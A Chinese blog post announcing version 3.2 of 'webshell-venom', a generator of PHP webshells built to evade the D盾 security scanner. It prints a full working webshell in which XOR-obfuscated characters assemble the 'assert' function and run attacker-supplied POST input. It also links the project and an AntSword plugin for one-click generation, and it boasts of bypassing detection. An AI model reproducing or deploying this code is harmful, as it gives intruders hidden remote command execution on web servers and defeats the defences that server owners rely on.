美文网首页
webshell-venom 3.2 :免杀D盾无压力 ——yz

webshell-venom 3.2 :免杀D盾无压力 ——yz

作者: yzddMr6 | 来源:发表于2019-11-07 16:47 被阅读0次

前言

感谢大家对webshell-venom的支持

星球自开启以来已经源源不断有各路大佬加入

并且一起交流了很多的思路跟想法

为了不辜负大家的期望

自己这几天一大早上就起来写脚本发文章,基本上星球里都是一天两更

项目在今天也达到了700个星

image

所以特地推出webshell-venom 3.2版本

webshell-venom 3.2 的蚁剑插件版也已经在蚁剑商店上市

image

原来已经有的点击更新即可

3.2是github公开版,所有人都可以下载

(webshell-venom 3.x系列 不支持php7环境,如果需要星球内部版4.0请点击下面链接)

https://yzddmr6.tk/posts/webshell-venom-notice/

正文

样例

其实我当时还纠结是命名为3.2还是3.3

因为在 https://yzddmr6.tk/2019/08/13/webshell-venom-3-1-3-2/

这篇帖子里虽然说了3.2的更新,但是实际上并没有发布

后来研究了一下还可以用另一种方式绕过

就是套一个函数,把异或的返回值通过类里的函数进行传递。

具体的可以看一下下面的代码

<?php 
class  TIPD{ 
function AJZN(){
$upf='Q'^"\x30";
$imp='R'^"\x21";
$rec='u'^"\x6";
$yba='/'^"\x4a";
$ebi=':'^"\x48";
$pvu='D'^"\x30";
$VDMX=$upf.$imp.$rec.$yba.$ebi.$pvu;
return $VDMX;}function __destruct(){
$UNOF=$this->AJZN();
@$UNOF($this->FJ);}}
$tipd=new TIPD();
@$tipd->FJ=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
?>

因为我说过D盾其实还是不认识异或的,至少还是不敏感。

用类里函数传参的方法也是一个很好的手段。

绕过的办法有很多,我只是提供一个demo。

使用方法

https://github.com/yzddmr6/webshell-venom/tree/master/php

蚁剑插件

image

老套路,直接生成

过盾截图

一键免杀D盾

image image

更新后效果还不错,但是缺点就是有点长。。。

最后

免杀这一块不同于其他工具

其实很多人都有很好的方法,只不过是大家都不愿意分享

因为看看论坛里的帖子大家就会发现一个真理

分享就意味着失效

我分享出来也是为了让大家能开阔思路,更进一步

建立圈子也是为了创造一个更好的交流环境。共同提高

项目地址

https://github.com/yzddmr6/webshell-venom

蚁剑插件版

https://github.com/yzddmr6/as_webshell_venom

相关文章

  • webshell-venom 3.2 :免杀D盾无压力 ——yz

    前言 感谢大家对webshell-venom的支持 星球自开启以来已经源源不断有各路大佬加入 并且一起交流了很多的...

  • 一键免杀D盾(webshell-venom 3.0 发布)

    前言 我承诺过300个星后放出3.0 项目地址: https://github.com/yzddmr6/websh...

  • 利用随机异或无限免杀d盾 ——yzddMr6

    前言 最近D盾更新了,在某司某圈也看到了不少免杀d盾免杀狗的一句话帖子但是基本上只要放出来不到两天时间就加入查杀全...

  • 无限免杀D盾脚本之aspx ——yzddMr6

    前言 自己曾经写过一篇文章:利用随机异或无限免杀某盾 php的webshell免杀方法有很多,但是市面上很少有讲a...

  • Webshell免杀

    前言 最近在研究php免杀绕过安全狗、D盾等WAF防护软件。也算是小有成绩。故记录下来。 一句话木马 在渗透测试中...

  • 浅谈meterpreter免杀

    前言 最近玩了玩免杀,学习了很多免杀的技巧,免杀基本就那么几个套路,静态文件特征码免杀,内存特征码免杀,行为免杀,...

  • 木马免杀之源码免杀|断刀流技术博客

    源码免杀 在业内也被称为“白盒免杀”,与通常的修改二进制代码的“黑盒免杀”想对应。随着免杀技术与反病毒技术的不断博...

  • 赵氏孤儿之《左传》版

    晋灵公无道,欲杀忠臣赵盾不果,反被赵盾堂弟赵穿所杀。可赵盾却从此无端背负了一个“弑君”恶名。赵盾未参与弑君为何背负...

  • 杀毒与免杀技术详解之三:特征码免杀实战

    杀毒与免杀技术详解之三:特征码免杀实战杀毒与免杀技术详解之二:特征码定位-工具及原理

  • 免杀基础

    (本文源于转载或摘抄整理):首先是免杀的概念一、什么是免杀 免杀,也就是反病毒(AntiVirus)与反间 谍(A...

网友评论

      本文标题:webshell-venom 3.2 :免杀D盾无压力 ——yz

      本文链接:https://www.haomeiwen.com/subject/qhmvbctx.html